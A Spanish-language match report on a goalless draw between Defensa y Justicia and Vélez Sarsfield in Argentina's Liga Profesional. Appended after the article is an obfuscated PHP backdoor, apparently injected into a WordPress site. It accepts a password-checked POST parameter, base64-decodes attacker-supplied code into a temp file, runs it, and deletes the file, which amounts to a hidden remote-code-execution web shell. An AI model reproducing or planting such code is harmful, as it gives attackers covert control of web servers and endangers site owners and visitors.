Aunque lo intentaron, ni Defensa y Justicia ni Vélez encontraron el gol

Foto: Defensa y Justicia

Defensa y Justicia y Vélez Sarsfield empataron 0-0, en el estadio Norberto Tito Tomaghello, abriendo la novena fecha de la Liga Profesional de Fútbol. Un punto que, en definitiva, no le sirve demasiado a ninguno de los dos.

Tuvieron el arco de enfrente en la mira durante todo el partido, sin embargo debieron quedarse con el grito atragantado. Ambos conjuntos, que se alternaron en el control, le imprimieron ritmo rápido, fueron verticales e hicieron transiciones aceleradas -el mediocampo fue zona de libre acceso- y dispusieron de sus situaciones.

Defensa y Justicia estuvo más cerca con un disparo bajo y cruzado de Santiago Solari, tras recibir un pase de David Barbona y enganchar sobre la izquierda, que motivó una tapada salvadora de Leonardo Burián, a los 34 minutos del primer tiempo.

Vélez produjo su situación más clara con un remate de Walter Bou, luego de controlar un pase de Tomás Guidara, girar y sacar un potente derechazo que sacudió el travesaño, a los 3 minutos del segundo tiempo.

El atrevimiento de la Pulga Prestianni, que ingresó a los 17 minutos del segundo tiempo, le dio al equipo de Ricardo Gareca frescura y talento para desequilibrar. Pero el equipo visitante sintió el impacto de quedarse con un jugador menos en los instantes finales, por la expulsión de José Florentín, al recibir la segunda amonestación a los 39 minutos.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}